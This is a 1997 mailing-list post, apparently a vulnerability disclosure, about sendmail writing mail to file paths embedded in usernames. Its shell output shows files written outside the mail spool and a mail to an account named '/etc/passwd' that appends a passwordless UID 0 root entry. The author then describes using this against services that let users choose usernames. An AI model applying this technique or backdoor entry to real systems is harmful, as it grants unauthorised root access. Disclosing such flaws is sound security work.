Sendmail quirks

From: Duck Vader (tiepilotat_private)
Date: Tue Dec 02 1997 - 14:51:24 PST

            Going through my mail the other day, I noticed some junk mail from
    ..@somehost, and wondered what would happen if I had a user by the same
    name. Well, it seems sendmail will readily write to a path in the username
    as long as it doesn't begin with a forward slash. A few quick examples:

    thePond:~# cat /etc/passwd | grep ../
    ../../a:*:519:100:tmp:/home/tmp:/bin/tcsh
    thePond:~# ls -l /var/a
    -rw-------   1 ../../a  users           0 Nov 23 12:14 /var/a

    thePond:/var/spool# ls -ld atjobs
    drwxr-xr-x   2 root     root         1024 Nov 23 11:55 atjobs
    thePond:/var/spool# cat /etc/passwd | grep atjobs
    ../atjobs:*:520:100:tmp:/tmp:/bin/tcsh
    thePond:/var/spool# ls -l
    total 16
    drwxr-xr-x   2 root     root         1024 Nov 23 11:55 BOGUS.EYF
    -rw-------   1 ../atjob users           0 Nov 23 12:20 atjobs

    Yes, you can precede the pathname with a forward slash.
    thePond:~# cat /etc/passwd | grep passwd
    /etc/passwd:*:515:100:tmp:/home/tmp:
    thePond:~# cat /etc/passwd
    root:*:0:0:root:/root:/bin/tcsh
    bin:*:1:1:bin:/bin:
    daemon:*:2:2:daemon:/sbin:
    [Edited out more passwords..]
    >From root Tue Nov 25 20:44:00 1997
    To: /etc/passwd

    eviluser::0:0:Sendmail quirks:/root:/bin/tcsh

            This probably will not be a problem for the average user. However,
    BBSes and free email services often let the user select his own username,
    and will add him to /etc/passwd for email and whatnot. If I ran into a
    site that did this, I could just specify my login as /etc/passwd and write
    myself a new username, this time with UID:GID 0:0 :)

                          | tiepilot - The Duck Jedi Master |
                          |     duckvaderat_private    |
                          |     tiepilotat_private    |

    Never put off till tomorrow what you can avoid all together.

    Hacker's Law:
            The belief that enhanced understanding will necessarily stir a
    nation to action is one of mankind's oldest illusions.